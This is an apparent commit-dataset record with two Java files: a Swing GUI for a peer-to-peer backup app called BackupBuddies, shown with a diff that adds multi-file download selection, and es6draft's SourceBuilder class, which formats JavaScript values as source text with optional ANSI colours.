save location"); browser.setFileSelectionMode(JFileChooser.DIRECTORIES_ONLY); browser.setAcceptAllFileFilterUsed(false); if (browser.showOpenDialog(frame) == JFileChooser.APPROVE_OPTION) { saveDir.setText(browser.getSelectedFile().toString()); Interface.testFile(saveDir.getText()); } } //user selects a file and it uploads to network public static void chooseAndUpload() { JFileChooser browser = new JFileChooser(); browser.setDialogTitle("choose file to upload"); if (browser.showOpenDialog(frame) == JFileChooser.APPROVE_OPTION) { //since download will be separate name and directory //might be easier to keep separate Interface.uploadFile(browser.getSelectedFile().getName(), browser.getCurrentDirectory().toString()); } } //user downloads a file to save directory (and chooses if not set) public static void setDirAndDownload() { //FIXME: need to have a list of uploaded files to choose from //String fileToGet = "test.txt"; if (saveDir.getText().equals("")) { setSaveDir(); } int[] selected = hi.getSelectedIndices(); for(int i=0; i<selected.length; i++){ //System.out.printf("Index: %d %s\n", i, hi.getModel().getElementAt(selected[i]).getName()); Interface.downloadFile(hi.getModel().getElementAt(selected[i]).getName(), saveDir.getText()); } } //upload, download, save control buttons public static JPanel controlPanel() { //create panel JPanel controlPanel = new JPanel(); //create components JLabel fileLabel = new JLabel("backup your files"); JButton uploadButton = new JButton("upload"); JButton downloadButton = new JButton("download"); JButton pathButton = new JButton("save to..."); //bind methods to buttons uploadButton.addActionListener(new ActionListener() { @Override public void actionPerformed(ActionEvent e) { chooseAndUpload(); } }); pathButton.addActionListener(new ActionListener() { @Override public void actionPerformed(ActionEvent e) { setSaveDir(); } }); downloadButton.addActionListener(new ActionListener() { @Override public void actionPerformed(ActionEvent e) { setDirAndDownload(); } }); //add components to panel and specify orientation controlPanel.add(fileLabel); controlPanel.add(pathButton); controlPanel.add(uploadButton); controlPanel.add(downloadButton); controlPanel.setComponentOrientation( ComponentOrientation.LEFT_TO_RIGHT); return controlPanel; } //allows user to input ip and pass and connect to network public static JPanel loginPanel() { //create panel final JPanel loginPanel = new JPanel(); //create components final JLabel loginLabel = new JLabel("join a network:"); final JButton loginButton = new JButton("join"); final JTextField ipField = new JTextField("network ip"); final JTextField passField = new JTextField("network password"); //bind methods to buttons loginButton.addActionListener(new ActionListener() { @Override public void actionPerformed(ActionEvent e) { Interface.login(ipField.getText(), passField.getText()); } }); ipField.addMouseListener(new MouseAdapter() { @Override public void mouseClicked(MouseEvent e) { ipField.setText(""); } }); passField.addMouseListener(new MouseAdapter() { @Override public void mouseClicked(MouseEvent e) { passField.setText(""); } }); //add components to panel and specify orientation loginPanel.add(loginLabel); loginPanel.add(ipField); loginPanel.add(passField); loginPanel.add(loginButton); loginPanel.setComponentOrientation( ComponentOrientation.LEFT_TO_RIGHT); return loginPanel; } //list of peers in the network //TODO: multiple selection //TODO: renders images public static JScrollPane userListPanel() { //userMap = fetchAndProcess("users"); JList<ListModel> list = new JList<ListModel>(Interface.fetchUserList()); list.setCellRenderer(new ListRenderer()); JScrollPane pane = new JScrollPane(list); pane.setPreferredSize(new Dimension(300, 100)); return pane; } //list of files you can recover //TODO: multiple selection //TODO: renders images public static JScrollPane fileListPanel(String search) { test = (Interface.fetchFileList()); hi.setModel(test); hi.setCellRenderer(new ListRenderer()); JScrollPane pane = new JScrollPane(hi); pane.setPreferredSize(new Dimension(300, 100)); return pane; } public static void fileSearch(String search){ int cap = debug.getSize(); test.clear(); for(int i=0; i<cap; i++){ ListModel model = debug.elementAt(i); String name = model.getName(); if(name.indexOf(search) != -1){ ListModel add = new ListModel(model.getName(), model.getStatus()); test.addElement(add); } } } public static JPanel searchPanel() { JPanel panel = new JPanel(); JLabel label = new JLabel("search for file:"); JTextField search = new JTextField("search"); search.addMouseListener(new MouseAdapter() { @Override public void mouseClicked(MouseEvent e) { search.setText(""); } }); search.getDocument().addDocumentListener(new DocumentListener(){ @Override public void changedUpdate(DocumentEvent arg0) { System.out.printf("changed\n"); } @Override public void insertUpdate(DocumentEvent arg0) { fileSearch(search.getText()); } @Override public void removeUpdate(DocumentEvent arg0) { fileSearch(search.getText()); } }); panel.add(label); panel.add(search); return panel; } public static JPanel varsPanel() { //create panel final JPanel panel = new JPanel(); //create components final JLabel varsPanelLabel = new JLabel("enter encryption key:"); final JButton lockPassButton = new JButton("confirm key"); final JTextField keyField = new JTextField("encryption key"); //bind methods to buttons lockPassButton.addActionListener(new ActionListener() { @Override public void actionPerformed(ActionEvent e) { Interface.setEncryptKey(keyField.getText()); } }); keyField.addMouseListener(new MouseAdapter() { @Override public void mouseClicked(MouseEvent e) { keyField.setText(""); } }); int min = 0; int max = 1000; int init = 1; final JLabel sliderLabel = new JLabel("storage (GB):"); final JSlider slider = new JSlider(JSlider.HORIZONTAL, min, max, init); slider.setMajorTickSpacing(max / 10); slider.setPaintTicks(true); slider.addChangeListener(new ChangeListener() { @Override public void stateChanged(ChangeEvent e) { if (!slider.getValueIsAdjusting()) { Interface.setStorageSpace(slider.getValue()); } } }); //add components to panel and specify orientation panel.add(varsPanelLabel); panel.add(keyField); panel.add(lockPassButton); panel.add(sliderLabel); panel.add(slider); panel.setComponentOrientation( ComponentOrientation.LEFT_TO_RIGHT); return panel; } public static JPanel logPanel() { //create panel final JPanel panel = new JPanel(); //create components final JLabel logLabel = new JLabel("event log"); log.setEditable(false); //log.append(text + newline) panel.add(logLabel); panel.add(log); return panel; } //bind panels to frame and display the gui public static void startGui() { javax.swing.SwingUtilities.invokeLater(new Runnable() { public void run() { //start those intervals startIntervals(1000); //create the window and center it on screen frame = new JFrame("BackupBuddies"); frame.setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE); frame.setResizable(false); Container contentPane = frame.getContentPane(); SpringLayout layout = new SpringLayout(); contentPane.setLayout(layout); //these values are used to center despite pack() overriding frame.setSize(700, 400); //frame.setLocationRelativeTo(null); //FIXME: migrate to SpringLayout //this uses the easy yet terrible BorderLayout to //prototype each panel //populate the window JPanel loginPanel = new JPanel(); JPanel controlPanel = new JPanel(); JPanel searchPanel = new JPanel(); JPanel varsPanel = new JPanel(); JPanel logPanel = new JPanel(); JScrollPane userListPanel = new JScrollPane(); JScrollPane fileListPanel = new JScrollPane(); JScrollPane hit = new JScrollPane(); loginPanel = loginPanel(); controlPanel = controlPanel(); userListPanel = userListPanel(); fileListPanel = fileListPanel(""); searchPanel = searchPanel(); varsPanel = varsPanel(); logPanel = logPanel(); contentPane.add(loginPanel); contentPane.add(controlPanel); contentPane.add(userListPanel); contentPane.add(fileListPanel); contentPane.add(searchPanel); contentPane.add(varsPanel); contentPane.add(logPanel); contentPane.add(hit); //set locations for each panel layout.putConstraint(SpringLayout.SOUTH, varsPanel, 5, SpringLayout.SOUTH, contentPane); layout.putConstraint(SpringLayout.SOUTH, logPanel, -50, SpringLayout.SOUTH, contentPane); //layout.putConstraint(SpringLayout.EAST, logPanel, 5, // SpringLayout.WEST, contentPane); layout.putConstraint(SpringLayout.NORTH, loginPanel, 5, SpringLayout.NORTH, contentPane); layout.putConstraint(SpringLayout.WEST, loginPanel, 5, SpringLayout.WEST, contentPane); layout.putConstraint(SpringLayout.WEST, userListPanel, 5, SpringLayout.WEST, contentPane); layout.putConstraint(SpringLayout.NORTH, userListPanel, 5, SpringLayout.SOUTH, loginPanel); layout.putConstraint(SpringLayout.NORTH, controlPanel, 5, SpringLayout.SOUTH, userListPanel); layout.putConstraint(SpringLayout.WEST, controlPanel, 5, SpringLayout.WEST, contentPane); layout.putConstraint(SpringLayout.WEST, fileListPanel, 20, SpringLayout.EAST, userListPanel); layout.putConstraint(SpringLayout.NORTH, fileListPanel, 5, SpringLayout.SOUTH, loginPanel); layout.putConstraint(SpringLayout.WEST, searchPanel, 25, SpringLayout.EAST, userListPanel); layout.putConstraint(SpringLayout.NORTH, searchPanel, 7, SpringLayout.NORTH, contentPane); //display the window //pack - layout manager auto sizes and auto locates //fixes size issue with insets/border of frame //aka use minimum frame size to display the content //frame.pack(); frame.validate(); frame.repaint(); frame.setVisible(true); } }); } }
backupbuddies/gui/GuiMain.java
package backupbuddies.gui; import java.awt.*; import java.awt.event.*; import javax.swing.*; import javax.swing.event.DocumentEvent; import javax.swing.event.DocumentListener; import javax.swing.event.ChangeListener; import javax.swing.event.ChangeEvent; import java.util.List; import java.util.ArrayList; import java.util.Map; import java.util.Set; import java.util.HashMap; import java.lang.*; import java.lang.Object; //do not import util.* //there is a Timer class in util and swing that conflict //currently using swing timer import backupbuddies.shared.Interface; import backupbuddies.gui.ListModel; import static backupbuddies.Debug.*; @SuppressWarnings("serial") public class GuiMain extends JFrame { //load assets, lists etc before creating the gui static JFrame frame; static JTextField saveDir = new JTextField(); static final DefaultListModel<String> userModel = new DefaultListModel<String>(); static final DefaultListModel<String> fileModel = new DefaultListModel<String>(); static DefaultListModel<String> files = new DefaultListModel<String>(); static DefaultListModel<ListModel> test = new DefaultListModel<ListModel>(); static JList<ListModel> hi = new JList<ListModel>(); static DefaultListModel<ListModel> debug = new DefaultListModel<ListModel>(); static final JTextArea log = new JTextArea(5, 20); static List<String> prevEvents = new ArrayList<>(); static ImageIcon statusRed = new ImageIcon("bin/backupbuddies/gui/assets/RedCircle.png"); static ImageIcon statusYellow = new ImageIcon("bin/backupbuddies/backupbuddies/gui/assets/YellowCircle.png"); static ImageIcon statusGreen = new ImageIcon("bin/backupbuddies/backupbuddies/gui/assets/GreenCircle.png"); static JList<ListModel> userMap = fetchAndProcess("users"); static JList<ListModel> fileMap = fetchAndProcess("files"); //process lists returned from networking //NOTE: to speed this up we can just do it in the interface methods //iteration already occurs there public static JList<ListModel> fetchAndProcess(String type) { //get data JList<ListModel> map = new JList<ListModel>(); //debug = new DefaultListModel<>(); if (type.equals("users")) debug = Interface.fetchUserList(); else if (type.equals("files")) debug = Interface.fetchFileList(); return map; } //updates ui on interval public static void startIntervals(int interval) { ActionListener updateUI = new ActionListener() { public void actionPerformed(ActionEvent e) { userMap = fetchAndProcess("users"); fileMap = fetchAndProcess("files"); //FIXME: this gets slower as more events are added //prevArray --> int (length of last returned array) //change to check length of returned array //append the last (len(events) - prevLength) elements to log //if this is negative they cleared the event log //only reset prevArraysize variable List<String> events = Interface.getEventLog(); for (String event : events) { if (!prevEvents.contains(event)) { log.append(event + "\n"); log.setCaretPosition(log.getDocument().getLength()); } } prevEvents = events; } }; Timer timer = new Timer(interval, updateUI); timer.setRepeats(true); timer.start(); } //user chooses directory to save to public static void setSaveDir() { JFileChooser browser = new JFileChooser(); browser.setDialogTitle("choose save location"); browser.setFileSelectionMode(JFileChooser.DIRECTORIES_ONLY); browser.setAcceptAllFileFilterUsed(false); if (browser.showOpenDialog(frame) == JFileChooser.APPROVE_OPTION) { saveDir.setText(browser.getSelectedFile().toString()); Interface.testFile(saveDir.getText()); } } //user selects a file and it uploads to network public static void chooseAndUpload() { JFileChooser browser = new JFileChooser(); browser.setDialogTitle("choose file to upload"); if (browser.showOpenDialog(frame) == JFileChooser.APPROVE_OPTION) { //since download will be separate name and directory //might be easier to keep separate Interface.uploadFile(browser.getSelectedFile().getName(), browser.getCurrentDirectory().toString()); } } //user downloads a file to save directory (and chooses if not set) public static void setDirAndDownload() { //FIXME: need to have a list of uploaded files to choose from String fileToGet = "test.txt"; if (saveDir.getText().equals("")) { setSaveDir(); } Interface.downloadFile(fileToGet, saveDir.getText()); } //upload, download, save control buttons public static JPanel controlPanel() { //create panel JPanel controlPanel = new JPanel(); //create components JLabel fileLabel = new JLabel("backup your files"); JButton uploadButton = new JButton("upload"); JButton downloadButton = new JButton("download"); JButton pathButton = new JButton("save to..."); //bind methods to buttons uploadButton.addActionListener(new ActionListener() { @Override public void actionPerformed(ActionEvent e) { chooseAndUpload(); } }); pathButton.addActionListener(new ActionListener() { @Override public void actionPerformed(ActionEvent e) { setSaveDir(); } }); downloadButton.addActionListener(new ActionListener() { @Override public void actionPerformed(ActionEvent e) { setDirAndDownload(); } }); //add components to panel and specify orientation controlPanel.add(fileLabel); controlPanel.add(pathButton); controlPanel.add(uploadButton); controlPanel.add(downloadButton); controlPanel.setComponentOrientation( ComponentOrientation.LEFT_TO_RIGHT); return controlPanel; } //allows user to input ip and pass and connect to network public static JPanel loginPanel() { //create panel final JPanel loginPanel = new JPanel(); //create components final JLabel loginLabel = new JLabel("join a network:"); final JButton loginButton = new JButton("join"); final JTextField ipField = new JTextField("network ip"); final JTextField passField = new JTextField("network password"); //bind methods to buttons loginButton.addActionListener(new ActionListener() { @Override public void actionPerformed(ActionEvent e) { Interface.login(ipField.getText(), passField.getText()); } }); ipField.addMouseListener(new MouseAdapter() { @Override public void mouseClicked(MouseEvent e) { ipField.setText(""); } }); passField.addMouseListener(new MouseAdapter() { @Override public void mouseClicked(MouseEvent e) { passField.setText(""); } }); //add components to panel and specify orientation loginPanel.add(loginLabel); loginPanel.add(ipField); loginPanel.add(passField); loginPanel.add(loginButton); loginPanel.setComponentOrientation( ComponentOrientation.LEFT_TO_RIGHT); return loginPanel; } //list of peers in the network //TODO: multiple selection //TODO: renders images public static JScrollPane userListPanel() { //userMap = fetchAndProcess("users"); JList<ListModel> list = new JList<ListModel>(Interface.fetchUserList()); list.setCellRenderer(new ListRenderer()); JScrollPane pane = new JScrollPane(list); pane.setPreferredSize(new Dimension(300, 100)); return pane; } //list of files you can recover //TODO: multiple selection //TODO: renders images public static JScrollPane fileListPanel(String search) { test = (Interface.fetchFileList()); hi.setModel(test); hi.setCellRenderer(new ListRenderer()); JScrollPane pane = new JScrollPane(hi); pane.setPreferredSize(new Dimension(300, 100)); return pane; } public static void fileSearch(String search){ int cap = debug.getSize(); test.clear(); for(int i=0; i<cap; i++){ ListModel model = debug.elementAt(i); String name = model.getName(); if(name.indexOf(search) != -1){ ListModel add = new ListModel(model.getName(), model.getStatus()); test.addElement(add); } } } public static JPanel searchPanel() { JPanel panel = new JPanel(); JLabel label = new JLabel("search for file:"); JTextField search = new JTextField("search"); search.addMouseListener(new MouseAdapter() { @Override public void mouseClicked(MouseEvent e) { search.setText(""); } }); search.getDocument().addDocumentListener(new DocumentListener(){ @Override public void changedUpdate(DocumentEvent arg0) { System.out.printf("changed\n"); } @Override public void insertUpdate(DocumentEvent arg0) { fileSearch(search.getText()); } @Override public void removeUpdate(DocumentEvent arg0) { fileSearch(search.getText()); } }); panel.add(label); panel.add(search); return panel; } public static JPanel varsPanel() { //create panel final JPanel panel = new JPanel(); //create components final JLabel varsPanelLabel = new JLabel("enter encryption key:"); final JButton lockPassButton = new JButton("confirm key"); final JTextField keyField = new JTextField("encryption key"); //bind methods to buttons lockPassButton.addActionListener(new ActionListener() { @Override public void actionPerformed(ActionEvent e) { Interface.setEncryptKey(keyField.getText()); } }); keyField.addMouseListener(new MouseAdapter() { @Override public void mouseClicked(MouseEvent e) { keyField.setText(""); } }); int min = 0; int max = 1000; int init = 1; final JLabel sliderLabel = new JLabel("storage (GB):"); final JSlider slider = new JSlider(JSlider.HORIZONTAL, min, max, init); slider.setMajorTickSpacing(max / 10); slider.setPaintTicks(true); slider.addChangeListener(new ChangeListener() { @Override public void stateChanged(ChangeEvent e) { if (!slider.getValueIsAdjusting()) { Interface.setStorageSpace(slider.getValue()); } } }); //add components to panel and specify orientation panel.add(varsPanelLabel); panel.add(keyField); panel.add(lockPassButton); panel.add(sliderLabel); panel.add(slider); panel.setComponentOrientation( ComponentOrientation.LEFT_TO_RIGHT); return panel; } public static JPanel logPanel() { //create panel final JPanel panel = new JPanel(); //create components final JLabel logLabel = new JLabel("event log"); log.setEditable(false); //log.append(text + newline) panel.add(logLabel); panel.add(log); return panel; } //bind panels to frame and display the gui public static void startGui() { javax.swing.SwingUtilities.invokeLater(new Runnable() { public void run() { //start those intervals startIntervals(1000); //create the window and center it on screen frame = new JFrame("BackupBuddies"); frame.setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE); frame.setResizable(false); Container contentPane = frame.getContentPane(); SpringLayout layout = new SpringLayout(); contentPane.setLayout(layout); //these values are used to center despite pack() overriding frame.setSize(700, 400); //frame.setLocationRelativeTo(null); //FIXME: migrate to SpringLayout //this uses the easy yet terrible BorderLayout to //prototype each panel //populate the window JPanel loginPanel = new JPanel(); JPanel controlPanel = new JPanel(); JPanel searchPanel = new JPanel(); JPanel varsPanel = new JPanel(); JPanel logPanel = new JPanel(); JScrollPane userListPanel = new JScrollPane(); JScrollPane fileListPanel = new JScrollPane(); JScrollPane hit = new JScrollPane(); loginPanel = loginPanel(); controlPanel = controlPanel(); userListPanel = userListPanel(); fileListPanel = fileListPanel(""); searchPanel = searchPanel(); varsPanel = varsPanel(); logPanel = logPanel(); contentPane.add(loginPanel); contentPane.add(controlPanel); contentPane.add(userListPanel); contentPane.add(fileListPanel); contentPane.add(searchPanel); contentPane.add(varsPanel); contentPane.add(logPanel); contentPane.add(hit); //set locations for each panel layout.putConstraint(SpringLayout.SOUTH, varsPanel, 5, SpringLayout.SOUTH, contentPane); layout.putConstraint(SpringLayout.SOUTH, logPanel, -50, SpringLayout.SOUTH, contentPane); //layout.putConstraint(SpringLayout.EAST, logPanel, 5, // SpringLayout.WEST, contentPane); layout.putConstraint(SpringLayout.NORTH, loginPanel, 5, SpringLayout.NORTH, contentPane); layout.putConstraint(SpringLayout.WEST, loginPanel, 5, SpringLayout.WEST, contentPane); layout.putConstraint(SpringLayout.WEST, userListPanel, 5, SpringLayout.WEST, contentPane); layout.putConstraint(SpringLayout.NORTH, userListPanel, 5, SpringLayout.SOUTH, loginPanel); layout.putConstraint(SpringLayout.NORTH, controlPanel, 5, SpringLayout.SOUTH, userListPanel); layout.putConstraint(SpringLayout.WEST, controlPanel, 5, SpringLayout.WEST, contentPane); layout.putConstraint(SpringLayout.WEST, fileListPanel, 20, SpringLayout.EAST, userListPanel); layout.putConstraint(SpringLayout.NORTH, fileListPanel, 5, SpringLayout.SOUTH, loginPanel); layout.putConstraint(SpringLayout.WEST, searchPanel, 25, SpringLayout.EAST, userListPanel); layout.putConstraint(SpringLayout.NORTH, searchPanel, 7, SpringLayout.NORTH, contentPane); //display the window //pack - layout manager auto sizes and auto locates //fixes size issue with insets/border of frame //aka use minimum frame size to display the content //frame.pack(); frame.validate(); frame.repaint(); frame.setVisible(true); } }); } }
can select multiple indices on the fileList
backupbuddies/gui/GuiMain.java
can select multiple indices on the fileList
<ide><path>ackupbuddies/gui/GuiMain.java <ide> import java.util.Set; <ide> import java.util.HashMap; <ide> import java.lang.*; <del>import java.lang.Object; <ide> <ide> //do not import util.* <ide> //there is a Timer class in util and swing that conflict <ide> //user downloads a file to save directory (and chooses if not set) <ide> public static void setDirAndDownload() { <ide> //FIXME: need to have a list of uploaded files to choose from <del> String fileToGet = "test.txt"; <add> //String fileToGet = "test.txt"; <ide> if (saveDir.getText().equals("")) { <ide> setSaveDir(); <ide> } <del> Interface.downloadFile(fileToGet, saveDir.getText()); <add> <add> int[] selected = hi.getSelectedIndices(); <add> for(int i=0; i<selected.length; i++){ <add> //System.out.printf("Index: %d %s\n", i, hi.getModel().getElementAt(selected[i]).getName()); <add> Interface.downloadFile(hi.getModel().getElementAt(selected[i]).getName(), saveDir.getText()); <add> } <ide> } <ide> <ide> //upload, download, save control buttons
Java
mit
03e14ae65ad79d2061c89457e6a2f632f1d211a6
0
jugglinmike/es6draft,jugglinmike/es6draft,jugglinmike/es6draft,anba/es6draft,jugglinmike/es6draft,anba/es6draft,anba/es6draft
/** * Copyright (c) 2012-2014 André Bargull * Alle Rechte vorbehalten / All Rights Reserved. Use is subject to license terms. * * <https://github.com/anba/es6draft> */ package com.github.anba.es6draft.repl; import static com.github.anba.es6draft.runtime.AbstractOperations.*; import java.util.HashSet; import java.util.Iterator; import java.util.Set; import java.util.regex.Pattern; import com.github.anba.es6draft.runtime.ExecutionContext; import com.github.anba.es6draft.runtime.internal.ScriptException; import com.github.anba.es6draft.runtime.objects.date.DateObject; import com.github.anba.es6draft.runtime.objects.date.DatePrototype; import com.github.anba.es6draft.runtime.objects.text.RegExpObject; import com.github.anba.es6draft.runtime.objects.text.RegExpPrototype; import com.github.anba.es6draft.runtime.types.Callable; import com.github.anba.es6draft.runtime.types.Property; import com.github.anba.es6draft.runtime.types.ScriptObject; import com.github.anba.es6draft.runtime.types.Symbol; import com.github.anba.es6draft.runtime.types.Type; import com.github.anba.es6draft.runtime.types.builtins.ExoticArray; /** * */ public final class SourceBuilder { private static final int MAX_STACK_DEPTH = 5; private static final int MAX_OBJECT_PROPERTIES = 30; private static final int MAX_ARRAY_PROPERTIES = 80; private SourceBuilder() { } private enum AnsiAttribute { Reset(0), Bold(1), Underline(4), Negative(7), NormalIntensity(22), UnderlineNone(24), Positive(27), TextColor(30), DefaultTextColor(39), BackgroundColor(40), DefaultBackgroundColor(49), TextColorHi(90), BackgroundColorHi(100); final int code; private AnsiAttribute(int code) { this.code = code; } int color(AnsiColor color) { return code + color.offset; } } private enum AnsiColor { Black(0), Red(1), Green(2), Yellow(3), Blue(4), Magenta(5), Cyan(6), White(7); final int offset; private AnsiColor(int offset) { this.offset = offset; } } private enum Style {/* @formatter:off */ Special(AnsiAttribute.TextColor.color(AnsiColor.Cyan), AnsiAttribute.DefaultTextColor), Number(AnsiAttribute.TextColor.color(AnsiColor.Yellow), AnsiAttribute.DefaultTextColor), Boolean(AnsiAttribute.TextColor.color(AnsiColor.Yellow), AnsiAttribute.DefaultTextColor), Undefined(AnsiAttribute.TextColorHi.color(AnsiColor.Black), AnsiAttribute.DefaultTextColor), Null(AnsiAttribute.Bold, AnsiAttribute.NormalIntensity), String(AnsiAttribute.TextColor.color(AnsiColor.Green), AnsiAttribute.DefaultTextColor), Symbol(AnsiAttribute.TextColor.color(AnsiColor.Green), AnsiAttribute.DefaultTextColor), Date(AnsiAttribute.TextColor.color(AnsiColor.Magenta), AnsiAttribute.DefaultTextColor), RegExp(AnsiAttribute.TextColor.color(AnsiColor.Red), AnsiAttribute.DefaultTextColor), ; /* @formatter:on */ private final int on; private final int off; private Style(AnsiAttribute on, AnsiAttribute off) { this(on.code, off.code); } private Style(int on, AnsiAttribute off) { this(on, off.code); } private Style(int on, int off) { this.on = on; this.off = off; } } public enum Mode { Simple, Color } /** * Returns the simple mode, source representation for {@code val}. * * @param cx * the execution context * @param val * the value * @return the source representation of the value */ public static String ToSource(ExecutionContext cx, Object val) { return ToSource(Mode.Simple, cx, val); } /** * Returns the source representation for {@code val}. * * @param mode * the source representation mode * @param cx * the execution context * @param val * the value * @return the source representation of the value */ public static String ToSource(Mode mode, ExecutionContext cx, Object val) { HashSet<ScriptObject> stack = new HashSet<>(); return toSource(mode, cx, stack, val); } private static String toSource(Mode mode, ExecutionContext cx, Set<ScriptObject> stack, Object value) { if (Type.isObject(value)) { ScriptObject objValue = Type.objectValue(value); Object toSource = Get(cx, objValue, "toSource"); if (IsCallable(toSource)) { return ToFlatString(cx, ((Callable) toSource).call(cx, objValue)); } } return format(mode, source(mode, cx, stack, value), style(stack, value)); } private static String format(Mode mode, String source, Style style) { if (mode == Mode.Simple || style == null) { return source; } return String.format("\u001B[%dm%s\u001B[%d;%dm", style.on, source, AnsiAttribute.Reset.code, style.off); } private static Style style(Set<ScriptObject> stack, Object value) { switch (Type.of(value)) { case Undefined: return Style.Undefined; case Null: return Style.Null; case Boolean: return Style.Boolean; case String: return Style.String; case Number: return Style.Number; case Symbol: return Style.Symbol; case Object: default: if (IsCallable(value)) { return Style.Special; } if (stack.contains(value)) { return Style.Special; } if (value instanceof DateObject) { return Style.Date; } if (value instanceof RegExpObject) { return Style.RegExp; } return null; } } private static String source(Mode mode, ExecutionContext cx, Set<ScriptObject> stack, Object value) { switch (Type.of(value)) { case Null: return "null"; case Boolean: return Type.booleanValue(value) ? "true" : "false"; case String: return stringToSource(Type.stringValue(value)); case Symbol: return Type.symbolValue(value).toString(); case Number: return ToFlatString(cx, value); case Object: ScriptObject objValue = Type.objectValue(value); if (IsCallable(objValue)) { return ((Callable) objValue).toSource(); } if (stack.contains(objValue) || stack.size() > MAX_STACK_DEPTH) { return "« ... »"; } stack.add(objValue); try { if (objValue instanceof DateObject) { return DatePrototype.Properties.toString(cx, value).toString(); } else if (objValue instanceof RegExpObject) { return RegExpPrototype.Properties.toString(cx, value).toString(); } else if (objValue instanceof ExoticArray) { return arrayToSource(mode, cx, stack, objValue); } else { return objectToSource(mode, cx, stack, objValue); } } finally { stack.remove(objValue); } case Undefined: default: return "(void 0)"; } } private static final char[] hexdigits = { '0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'a', 'b', 'c', 'd', 'e', 'f' }; private static String stringToSource(CharSequence value) { StringBuilder sb = new StringBuilder(value.length() + 2); sb.append('"'); for (int i = 0, len = value.length(); i < len; ++i) { char c = value.charAt(i); switch (c) { case '"': case '\\': sb.append('\\').append(c); break; case '\b': sb.append("\\b"); break; case '\f': sb.append("\\f"); break; case '\n': sb.append("\\n"); break; case '\r': sb.append("\\r"); break; case '\t': sb.append("\\t"); break; default: if (c < 0x20 || c > 0xff) { sb.append('\\').append('u').append(hexdigits[(c >> 12) & 0xf]) .append(hexdigits[(c >> 8) & 0xf]).append(hexdigits[(c >> 4) & 0xf]) .append(hexdigits[(c >> 0) & 0xf]); } else { sb.append(c); } } } sb.append('"'); return sb.toString(); } private static final Pattern namePattern = Pattern .compile("\\p{javaJavaIdentifierStart}\\p{javaJavaIdentifierPart}*"); private static String propertyKeyToSource(Mode mode, Object key) { if (key instanceof String) { String s = (String) key; if (namePattern.matcher(s).matches()) { return s; } return format(mode, stringToSource(s), Style.String); } assert key instanceof Symbol; String description = ((Symbol) key).getDescription(); if (description == null) { description = "Symbol()"; } return format(mode, String.format("[%s]", description), Style.Symbol); } private static Property getOwnProperty(ExecutionContext cx, ScriptObject object, Object key) { try { if (key instanceof String) { return object.getOwnProperty(cx, (String) key); } else { return object.getOwnProperty(cx, (Symbol) key); } } catch (ScriptException e) { return null; } } private static String accessorToSource(Mode mode, Property accessor) { String description; if (accessor.getGetter() != null && accessor.getSetter() != null) { description = "[Getter/Setter]"; } else if (accessor.getGetter() != null) { description = "[Getter]"; } else if (accessor.getSetter() != null) { description = "[Setter]"; } else { description = "[]"; } return format(mode, description, Style.Special); } private static String objectToSource(Mode mode, ExecutionContext cx, Set<ScriptObject> stack, ScriptObject object) { Iterator<?> keys = GetOwnPropertyNamesIterator(cx, object); if (!keys.hasNext()) { return "{}"; } StringBuilder properties = new StringBuilder(); for (int i = 0; keys.hasNext() && i < MAX_OBJECT_PROPERTIES;) { Object k = ToPropertyKey(cx, keys.next()); String key = propertyKeyToSource(mode, k); Property prop = getOwnProperty(cx, object, k); if (prop == null || !prop.isEnumerable()) { continue; } String value; if (prop.isDataDescriptor()) { value = toSource(mode, cx, stack, prop.getValue()); } else { value = accessorToSource(mode, prop); } properties.append(", ").append(key).append(": ").append(value); i += 1; } if (keys.hasNext()) { properties.append(", [...]"); } properties.append(" }").setCharAt(0, '{'); return properties.toString(); } private static String arrayToSource(Mode mode, ExecutionContext cx, Set<ScriptObject> stack, ScriptObject array) { long len = ToUint32(cx, Get(cx, array, "length")); if (len <= 0) { return "[]"; } int viewLen = (int) Math.min(len, MAX_ARRAY_PROPERTIES); StringBuilder properties = new StringBuilder(); for (int index = 0; index < viewLen; ++index) { String value = toSource(mode, cx, stack, Get(cx, array, ToString(index))); properties.append(", ").append(value); } if (viewLen < len) { properties.append(", [...]"); } properties.append(" ]").setCharAt(0, '['); return properties.toString(); } }
src/main/java/com/github/anba/es6draft/repl/SourceBuilder.java
/** * Copyright (c) 2012-2014 André Bargull * Alle Rechte vorbehalten / All Rights Reserved. Use is subject to license terms. * * <https://github.com/anba/es6draft> */ package com.github.anba.es6draft.repl; import static com.github.anba.es6draft.runtime.AbstractOperations.*; import java.util.HashSet; import java.util.Iterator; import java.util.Set; import java.util.regex.Pattern; import com.github.anba.es6draft.runtime.ExecutionContext; import com.github.anba.es6draft.runtime.internal.ScriptException; import com.github.anba.es6draft.runtime.objects.date.DateObject; import com.github.anba.es6draft.runtime.objects.date.DatePrototype; import com.github.anba.es6draft.runtime.objects.text.RegExpObject; import com.github.anba.es6draft.runtime.objects.text.RegExpPrototype; import com.github.anba.es6draft.runtime.types.Callable; import com.github.anba.es6draft.runtime.types.Property; import com.github.anba.es6draft.runtime.types.ScriptObject; import com.github.anba.es6draft.runtime.types.Symbol; import com.github.anba.es6draft.runtime.types.Type; import com.github.anba.es6draft.runtime.types.builtins.ExoticArray; /** * */ public final class SourceBuilder { private static final int MAX_STACK_DEPTH = 5; private static final int MAX_OBJECT_PROPERTIES = 30; private static final int MAX_ARRAY_PROPERTIES = 80; private SourceBuilder() { } private enum AnsiAttribute { Reset(0), Bold(1), Underline(4), Negative(7), NormalIntensity(22), UnderlineNone(24), Positive(27), TextColor(30), DefaultTextColor(39), BackgroundColor(40), DefaultBackgroundColor(49), TextColorHi(90), BackgroundColorHi(100); final int code; private AnsiAttribute(int code) { this.code = code; } int color(AnsiColor color) { return code + color.offset; } } private enum AnsiColor { Black(0), Red(1), Green(2), Yellow(3), Blue(4), Magenta(5), Cyan(6), White(7); final int offset; private AnsiColor(int offset) { this.offset = offset; } } private enum Style {/* @formatter:off */ Special(AnsiAttribute.TextColor.color(AnsiColor.Cyan), AnsiAttribute.DefaultTextColor), Number(AnsiAttribute.TextColor.color(AnsiColor.Yellow), AnsiAttribute.DefaultTextColor), Boolean(AnsiAttribute.TextColor.color(AnsiColor.Yellow), AnsiAttribute.DefaultTextColor), Undefined(AnsiAttribute.TextColorHi.color(AnsiColor.Black), AnsiAttribute.DefaultTextColor), Null(AnsiAttribute.Bold, AnsiAttribute.NormalIntensity), String(AnsiAttribute.TextColor.color(AnsiColor.Green), AnsiAttribute.DefaultTextColor), Symbol(AnsiAttribute.TextColor.color(AnsiColor.Green), AnsiAttribute.DefaultTextColor), 